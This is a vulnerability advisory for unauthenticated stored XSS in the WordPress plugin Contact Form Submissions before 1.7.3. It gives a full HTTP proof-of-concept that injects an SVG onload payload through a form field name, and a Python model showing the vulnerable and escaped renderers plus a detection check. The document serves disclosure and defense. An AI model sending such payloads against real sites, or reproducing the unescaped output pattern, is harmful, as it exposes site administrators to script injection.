Contact Form Submissions < 1.7.3 - Unauthenticated Stored XSS
Description
The plugin does not sanitise and escape additional fields in contact form requests before outputting them in the related submission. As a result, an unauthenticated attacker could perform Cross-Site Scripting attacks against admins viewing the malicious submission.
Proof of Concept
POST /wp-json/contact-form-7/v1/contact-forms/1376/feedback HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------243715402120191890871051639470
X-Requested-With: XMLHttpRequest
Content-Length: 726
Connection: close

-----------------------------243715402120191890871051639470
Content-Disposition: form-data; name="your-name"

Attacker
-----------------------------243715402120191890871051639470
Content-Disposition: form-data; name="your-email"

[email protected]
-----------------------------243715402120191890871051639470
Content-Disposition: form-data; name="your-subject"

XSS Injection
-----------------------------243715402120191890871051639470
Content-Disposition: form-data; name="your-message"

Sorry, not sorry.
-----------------------------243715402120191890871051639470
Content-Disposition: form-data; name="<svg/onload=(alert)(/XSS/)>"

Injected
-----------------------------243715402120191890871051639470--
The XSS will be triggered when an admin views the related submission.
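The following is an added example, not code from the advisory or the plugin: it models the server side of the request above in Python to show where the bug lives and how to close it. The form's declared field names and the multipart body are taken from the PoC; `DECLARED_FIELDS`, the parser and both renderers are assumptions for illustration, and the hardened renderer escapes the field name as well as its value (the WordPress equivalent is `esc_html()` on both).

```python
import html
import re

# Fields the contact form declares (taken from the PoC request on this page).
DECLARED_FIELDS = {"your-name", "your-email", "your-subject", "your-message"}

# Constructed sample body modelled on the PoC request, with CRLF line endings as on the wire.
BOUNDARY = "---------------------------243715402120191890871051639470"
SAMPLE_BODY = (
    f"--{BOUNDARY}\r\nContent-Disposition: form-data; name=\"your-name\"\r\n\r\nAttacker\r\n"
    f"--{BOUNDARY}\r\nContent-Disposition: form-data; name=\"your-message\"\r\n\r\nSorry, not sorry.\r\n"
    f"--{BOUNDARY}\r\nContent-Disposition: form-data; name=\"<svg/onload=(alert)(/XSS/)>\"\r\n\r\nInjected\r\n"
    f"--{BOUNDARY}--\r\n"
)

def parse_multipart(body: str, boundary: str) -> dict:
    """Minimal multipart/form-data parser: returns {field name: value}."""
    fields = {}
    for part in body.split("--" + boundary):
        part = part.strip("\r\n")
        if not part or part == "--":  # preamble or closing delimiter
            continue
        headers, _, value = part.partition("\r\n\r\n")
        match = re.search(r'name="([^"]*)"', headers)
        if match:
            fields[match.group(1)] = value
    return fields

def unexpected_fields(fields: dict) -> set:
    """Field names the form never declared: the vector described in the advisory."""
    return {name for name in fields if name not in DECLARED_FIELDS}

def render_rows_vulnerable(fields: dict) -> str:
    """Mirrors the bug: the field *name* reaches the admin page unescaped."""
    return "".join(f"<tr><th>{name}</th><td>{html.escape(value)}</td></tr>"
                   for name, value in fields.items())

def render_rows_fixed(fields: dict) -> str:
    """Hardened: escape both name and value before output."""
    return "".join(f"<tr><th>{html.escape(name)}</th><td>{html.escape(value)}</td></tr>"
                   for name, value in fields.items())

if __name__ == "__main__":
    parsed = parse_multipart(SAMPLE_BODY, BOUNDARY)
    print("unexpected field names:", unexpected_fields(parsed))
    print(render_rows_fixed(parsed))
```

Logging the output of `unexpected_fields` on incoming submissions gives a simple detection signal, since legitimate forms only ever submit the field names they declare.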
References
https://wpscan.com/vulnerability/d02cf542-2d75-46bc-a0df-67bbe501cc89